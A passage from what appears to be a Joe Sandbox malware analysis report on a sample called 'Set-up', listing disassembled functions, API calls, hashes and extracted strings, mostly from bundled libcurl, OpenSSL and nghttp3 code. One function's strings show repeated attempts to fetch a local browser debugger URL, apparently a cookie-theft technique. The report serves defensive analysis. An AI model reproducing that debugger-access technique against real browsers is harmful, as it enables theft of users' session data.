                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno_stat64tolower
                                • String ID: Calling OPENSSL_DIR_read("%s")$Given path=%s$calling stat(%s)$file:$file_open$file_open_dir$file_open_stream$localhost/$providers/implementations/storemgmt/file_store.c
                                • API String ID: 3401003986-2019258128
                                • Opcode ID: 82649f1c9d01458b892426e657e15be09c057f9e07a20f8542c848fd0aa510ae
                                • Instruction ID: 9ce2471e9f4eb0738fdb6f2bbe9434fc30187333b9db0c76d287a5f62d9d50a0
                                • Opcode Fuzzy Hash: 82649f1c9d01458b892426e657e15be09c057f9e07a20f8542c848fd0aa510ae
                                • Instruction Fuzzy Hash: 20714B71A543006BDF21BB60AC43F2A7794AF11754F094928F989962C3F7B9E820CF97
                                Function 001725D0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 295COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
                                • API String ID: 0-3171374047
                                • Opcode ID: 79f91a1ae0af82b00cde3f3c5edd910c943dc262aaac2a90c012d6789b40d648
                                • Instruction ID: e9b6616962ab214b8ff216bed574b7b4b3074ddd710a035162f452f18e4da53c
                                • Opcode Fuzzy Hash: 79f91a1ae0af82b00cde3f3c5edd910c943dc262aaac2a90c012d6789b40d648
                                • Instruction Fuzzy Hash: 74B19E70A083019BDB259B24C881B7A77F4BF55704F19C13AF8AD47282DB359F86E792
                                Function 001AAA00 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 398COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,000002B9,001AAF5D,?,001AAA4A,001AAF5B,00000000,00000000), ref: 001AAA6A
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,000002EA,?,001AAA4A,001AAF5B,00000000,00000000), ref: 001AAAED
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,0000030E), ref: 001AAB78
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,000002B9), ref: 001AABAA
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00707F98,sfparse.c,00000378,?,?,?,001AA378,?,?,?), ref: 001AACBF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: sfparse.c
                                • API String ID: 1222420520-2103165582
                                • Opcode ID: 632db029ef644f436699277333f5e81f40dba4b301b8402da179e72223359ce9
                                • Instruction ID: bf62bffc34e79ef7994fb29d693b47cfae3750ce27d7a4e8b5019fcc8d33f08b
                                • Opcode Fuzzy Hash: 632db029ef644f436699277333f5e81f40dba4b301b8402da179e72223359ce9
                                • Instruction Fuzzy Hash: DDD1E27C6442028FDB394B28D884B39B7D2AF57325FB8865DE0A6C72D1E735A881C753
                                Function 001120AD Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 142COMMON
                                Download Yara Rule
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001120D4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001122D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: freemalloc
                                • String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
                                • API String ID: 3061335427-1249806554
                                • Opcode ID: 74c70d7252f37de2108cfabedbe6edb97c1ca2a3bd8efe6c87256f0973a3f521
                                • Instruction ID: af5816e0cef26f2ff1a9a23b607d7607c6f9280477763ecbdee67da126ea18be
                                • Opcode Fuzzy Hash: 74c70d7252f37de2108cfabedbe6edb97c1ca2a3bd8efe6c87256f0973a3f521
                                • Instruction Fuzzy Hash: BD61A2B0909309EFDB44EFA8D48579EBBF0BF58314F11882DE598A7341D77899848F92
                                Function 001B4920 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 162COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 001B499C
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 001B4A0A
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 001B4A8E
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 001B4AA3
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 001B4AB8
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 001B4B1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert$memcpy
                                • String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
                                • API String ID: 3718630003-1169204258
                                • Opcode ID: c67695eeee1278bd7ec9a16bd5fdb1775f3d6fdad988f74351e0972d01b16110
                                • Instruction ID: abbc1b32d517052db8dd3e821099851bfe2d4286a2e4512a0e9cbeee6fac1ad6
                                • Opcode Fuzzy Hash: c67695eeee1278bd7ec9a16bd5fdb1775f3d6fdad988f74351e0972d01b16110
                                • Instruction Fuzzy Hash: 275123B1640309ABD710DF38DC01BEB77E9EF5A358F048629FA95831D2D770A980C7A6
                                Function 002C4580 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 159stringCOMMON
                                Download Yara Rule
                                APIs
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00188C0E,?), ref: 002C45E3
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00188C0E,?), ref: 002C460A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcmp
                                • String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
                                • API String ID: 1004003707-1524119518
                                • Opcode ID: a6c0ad39d09925abacef2d127d757dbad35744e66af3706a82505d8859ce1c53
                                • Instruction ID: 3be1700d778d4c5925aa712a38a75e90a6b16c3fd3902154eadfd8d75a913d8c
                                • Opcode Fuzzy Hash: a6c0ad39d09925abacef2d127d757dbad35744e66af3706a82505d8859ce1c53
                                • Instruction Fuzzy Hash: BA41CAB5BA430166E63176643C13F6771588F11B4AF19062CFD09652C3FAD5DD3889A3
                                Function 00176810 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 344stringCOMMON
                                Download Yara Rule
                                APIs
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00176884
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 001768AC
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001768C1
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00176973
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00176983
                                • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00176995
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpystrchr$atoistrlen
                                • String ID: [
                                • API String ID: 444251876-784033777
                                • Opcode ID: 6e3c9b45e1fe969f3605a28fd6449856c730f6eee424e567c83d16930a39c376
                                • Instruction ID: 540538c378e52bcd66f9e275acb38b5057ac056b483fc477a736533bdf709d0b
                                • Opcode Fuzzy Hash: 6e3c9b45e1fe969f3605a28fd6449856c730f6eee424e567c83d16930a39c376
                                • Instruction Fuzzy Hash: 2AB16B71608B919BDB3A8A25C89077B7FF8EB56304F18C52EE9CDC7181EB39C9448752
                                Function 001163F0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00116467
                                Strings
                                • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00116462
                                • %s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00116540
                                • hsts.c, xrefs: 0011656B, 001165CF
                                • unlimited, xrefs: 001164A1
                                • %s%s "%s", xrefs: 001164AA
                                • %d%02d%02d %02d:%02d:%02d, xrefs: 001166D5
                                • mite, xrefs: 00116688
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: fwrite
                                • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
                                • API String ID: 3559309478-3911685517
                                • Opcode ID: 011ab137a5f36762bb48b2ae5bf856b5d972a2fd8fc24ce8e33764a685eb4370
                                • Instruction ID: 1f12af1942412d78b92dfe4f06406a7f0d05b9fab21e9344b815cc33a191efb2
                                • Opcode Fuzzy Hash: 011ab137a5f36762bb48b2ae5bf856b5d972a2fd8fc24ce8e33764a685eb4370
                                • Instruction Fuzzy Hash: 6081E6B1A05300AFD718DB24DC41BABB6E6AF99754F04453CF94987392EB32DD90CB92
                                Function 001B6210 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0018DB9C,?,001B3BB8,00000000,?,?), ref: 001B6433
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
                                • API String ID: 1222420520-1470553442
                                • Opcode ID: d295d4de08e6fac3ab6c709484afd220d1a010ab070127126330be202449e47f
                                • Instruction ID: d10d6004349e3e6b9db0521ed2e5f2a5c52253323c881c3cda1458cfbd9b0714
                                • Opcode Fuzzy Hash: d295d4de08e6fac3ab6c709484afd220d1a010ab070127126330be202449e47f
                                • Instruction Fuzzy Hash: BC7159B0604344AFDB25DF24DC81AEEB7E5BFA8704F008528F94A972A1E774E950CB52
                                Function 0012E760 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 448COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00135EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00135ED4
                                  • Part of subcall function 00154F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00154F9E
                                • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0012EA9B
                                  • Part of subcall function 001306F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00135663,?), ref: 001306F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$atoistrcpy
                                • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
                                • API String ID: 2444498485-4197959747
                                • Opcode ID: e1a3b6eb9551d947faf37d6bab64444e89949de173e864a277e8486f58caf3f3
                                • Instruction ID: 9bf6590dd6df2bbe047cd71a120dfec1d19da25f904cb5b0e1a9f4f082633f94
                                • Opcode Fuzzy Hash: e1a3b6eb9551d947faf37d6bab64444e89949de173e864a277e8486f58caf3f3
                                • Instruction Fuzzy Hash: 53F11375904310ABEF249F24EC86BA63BD5AF60708F084479FC489E2D7F771E96487A1
                                Function 0030A300 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 446stringCOMMON
                                Download Yara Rule
                                APIs
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0030A61C
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 0030A632
                                  • Part of subcall function 0030A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,0030A654,?,PRIVATE KEY), ref: 0030A0BD
                                  • Part of subcall function 0030A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0030A0C8
                                  • Part of subcall function 0030A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 0030A0DF
                                  • Part of subcall function 002838A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0028397E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcmpstrlen
                                • String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
                                • API String ID: 3853617425-3686562516
                                • Opcode ID: d806003e0e47dc8a3181bea54ede8c1f0eb328d308a18ef8dd979a80a48580ea
